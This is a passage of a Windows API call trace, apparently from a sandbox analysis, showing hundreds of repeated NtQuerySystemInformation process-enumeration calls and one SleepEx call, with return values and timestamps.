ResultLength=0x53ff7ec*=0x16e28) returned 0x0 [0173.631] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16e28) returned 0x0 [0173.632] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16e28) returned 0x0 [0173.632] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16e28) returned 0x0 [0173.633] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16e28) returned 0x0 [0173.679] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16d10) returned 0x0 [0173.680] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16d10) returned 0x0 [0173.681] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16d10) returned 0x0 [0173.682] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16d10) returned 0x0 [0173.683] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16d10) returned 0x0 [0173.683] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16d10) returned 0x0 [0173.684] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16d10) returned 0x0 [0173.685] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16d10) returned 0x0 [0173.690] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16d10) returned 0x0 [0173.691] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16d10) returned 0x0 [0173.691] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16d10) returned 0x0 [0173.692] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16d10) returned 0x0 [0173.693] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16d10) returned 0x0 [0173.693] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16d10) returned 0x0 [0173.694] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16d10) returned 0x0 [0173.694] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16d10) returned 0x0 [0173.695] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16d10) returned 0x0 [0173.701] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16d10) returned 0x0 [0173.702] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16d10) returned 0x0 [0173.703] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16d10) returned 0x0 [0173.704] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16d10) returned 0x0 [0173.704] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16d10) returned 0x0 [0173.705] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16d10) returned 0x0 [0173.706] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16d10) returned 0x0 [0173.706] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16d10) returned 0x0 [0173.707] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16d10) returned 0x0 [0173.712] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16d10) returned 0x0 [0173.713] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16d10) returned 0x0 [0173.713] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16d10) returned 0x0 [0173.714] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16d10) returned 0x0 [0173.715] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16d10) returned 0x0 [0173.715] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16d10) returned 0x0 [0173.716] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16d10) returned 0x0 [0173.717] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16d10) returned 0x0 [0173.806] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16d00) returned 0x0 [0173.807] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16d00) returned 0x0 [0173.808] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16d00) returned 0x0 [0173.809] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16d00) returned 0x0 [0173.809] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16d00) returned 0x0 [0173.810] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16d00) returned 0x0 [0173.810] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16d00) returned 0x0 [0173.811] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16d00) returned 0x0 [0173.812] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16d00) returned 0x0 [0173.817] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16d00) returned 0x0 [0173.818] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16d00) returned 0x0 [0173.819] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16d00) returned 0x0 [0173.820] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16d00) returned 0x0 [0173.820] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16d00) returned 0x0 [0173.821] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16d00) returned 0x0 [0173.821] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16d00) returned 0x0 [0173.822] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16d00) returned 0x0 [0173.827] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16d00) returned 0x0 [0173.828] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16d00) returned 0x0 [0173.829] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16d00) returned 0x0 [0173.830] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16d00) returned 0x0 [0173.830] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16d00) returned 0x0 [0173.831] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16d00) returned 0x0 [0173.831] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16d00) returned 0x0 [0173.832] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16d00) returned 0x0 [0173.833] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16d00) returned 0x0 [0173.882] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16d68) returned 0x0 [0173.883] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16d68) returned 0x0 [0173.884] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16d68) returned 0x0 [0173.884] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16d68) returned 0x0 [0173.885] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16d68) returned 0x0 [0173.886] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16d68) returned 0x0 [0173.886] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16d68) returned 0x0 [0173.887] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16d68) returned 0x0 [0173.893] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16d68) returned 0x0 [0173.894] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16d68) returned 0x0 [0173.894] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16d68) returned 0x0 [0173.895] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16d68) returned 0x0 [0173.896] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16d68) returned 0x0 [0173.896] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16d68) returned 0x0 [0173.897] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16d68) returned 0x0 [0173.897] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16d68) returned 0x0 [0173.898] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16d68) returned 0x0 [0173.903] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16d68) returned 0x0 [0173.904] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16d68) returned 0x0 [0173.904] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16d68) returned 0x0 [0173.905] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16d68) returned 0x0 [0173.905] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16d68) returned 0x0 [0173.906] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16d68) returned 0x0 [0173.907] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16d68) returned 0x0 [0173.907] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16d68) returned 0x0 [0173.913] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16d68) returned 0x0 [0173.913] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16d68) returned 0x0 [0173.914] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16d68) returned 0x0 [0173.915] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16d68) returned 0x0 [0173.915] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16d68) returned 0x0 [0173.916] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x16d68) returned 0x0 [0173.916] SleepEx (dwMilliseconds=0x9c4, bAlertable=1) returned 0x0 [0176.677] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x152b8) returned 0x0 [0176.678] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x152b8) returned 0x0 [0176.683] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x152b8) returned 0x0 [0176.684] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x152b8) returned 0x0 [0176.685] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x152b8) returned 0x0 [0176.685] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x152b8) returned 0x0 [0176.686] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x152b8) returned 0x0 [0176.686] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x152b8) returned 0x0 [0176.687] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x152b8) returned 0x0 [0176.687] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x152b8) returned 0x0 [0176.688] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x152b8) returned 0x0 [0176.695] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x152b8) returned 0x0 [0176.696] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x152b8) returned 0x0 [0176.696] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x152b8) returned 0x0 [0176.697] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x152b8) returned 0x0 [0176.697] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x152b8) returned 0x0 [0176.698] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x152b8) returned 0x0 [0176.699] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x152b8) returned 0x0 [0176.699] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x152b8) returned 0x0 [0176.700] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x152b8) returned 0x0 [0176.700] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x152b8) returned 0x0 [0176.705] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x152b8) returned 0x0 [0176.705] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x152b8) returned 0x0 [0176.706] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x152b8) returned 0x0 [0176.707] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x152b8) returned 0x0 [0176.707] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x152b8) returned 0x0 [0176.708] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x152b8) returned 0x0 [0176.708] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x152b8) returned 0x0 [0176.709] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x152b8) returned 0x0 [0176.710] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x152b8) returned 0x0 [0176.717] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x152b8) returned 0x0 [0176.718] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x152b8) returned 0x0 [0176.718] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x152b8) returned 0x0 [0176.719] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x152b8) returned 0x0 [0176.720] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, 